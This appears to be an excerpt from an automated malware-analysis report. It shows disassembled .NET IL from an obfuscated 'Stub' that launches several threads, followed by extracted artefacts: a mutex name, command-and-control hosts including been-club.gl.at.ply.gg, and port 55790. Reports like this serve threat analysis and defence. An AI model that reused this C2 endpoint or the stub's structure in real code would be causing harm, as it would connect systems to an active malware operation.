Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::bSERuEIx4LoGS2N4owx7FCYhOZF9dMKOSmdef() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::oIjOmuxXL2CscGJB8diAvJpTGE6ZeSyIzwfuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.ygrTwjprA3WB8o3n6QhIZAJZtRSDZkUUrNkUa::J5NRYsTdAcOHg731zTdNtjIpD5sHE9PUXxM0P() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0258: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() call System.Void Stub.YgViWqfb1qmddYsn3NWlJ9reDmNNojlhdoBfm::DXwOHkGFlDFxZTgXlbd9WmhGeR4ac1zAI03aF() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::A594cDxv0Up1xfMlQDrwTzMCcuACP0owrYaiN() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EFnhamSkxRZi9It340U5wQeLXHBOuJ1qHbiEm() newobj System.Void 
System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>

Artefacts

Name | Value
Mutex | yrFafqOjWo1AhGTQ
CnC | 127.0.0.1
CnC | been-club.gl.at.ply.gg
Port | 55790
